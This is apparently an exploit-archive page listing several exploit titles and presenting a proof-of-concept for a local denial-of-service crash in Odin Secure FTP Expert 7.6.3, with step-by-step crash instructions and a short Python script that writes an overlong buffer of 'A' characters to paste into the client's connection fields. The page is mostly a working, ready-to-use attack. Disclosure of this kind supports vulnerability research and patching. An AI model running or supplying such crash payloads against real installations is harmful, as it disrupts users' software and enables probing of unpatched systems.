
6 changes to exploits/shellcodes Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC) 10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP) Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation Multiple DrayTek Products - Pre-authentication Remote Root Code Execution ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin) Joomla! com_fabrik 3.9.11 - Directory Traversal Zen Load Balancer 3.10.1 - Remote Code Execution
25 lines
No EOL
855 B
Python
Executable file
25 lines
No EOL
855 B
Python
Executable file
# Exploit Title: Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC)
|
|
# Discovery by: Ivan Marmolejo
|
|
# Discovery Date: 2020-03-27
|
|
# Vendor Homepage: https://odin-secure-ftp-expert.jaleco.com/
|
|
# Software Link Download : http://tr.oldversion.com/windows/odin-secure-ftp-expert-7-6-3
|
|
# Version : Odin Secure FTP Expert 7.6.3
|
|
# Vulnerability Type: Denial of Service (DoS) Local
|
|
# Tested on OS: Windows 10 Home Single Lenguage (ESP)
|
|
|
|
Steps to Produce the Crash:
|
|
|
|
1.- Run python code: OdinSecureFTP.py
|
|
2.- Copy content to clipboard
|
|
3.- Open "OdinSecureFTPExpert.exe"
|
|
4.- Go to "Trial" > Connect > Quickconnect site
|
|
5.- Paste ClipBoard into the all fields
|
|
6.- Go to Connect
|
|
7.- Crashed
|
|
|
|
Python "OdinSecureFTP" Code:
|
|
|
|
buffer = "\x41" * 108
|
|
f = open ("OdinSecureFTP.txt", "w")
|
|
f.write(buffer)
|
|
f.close() |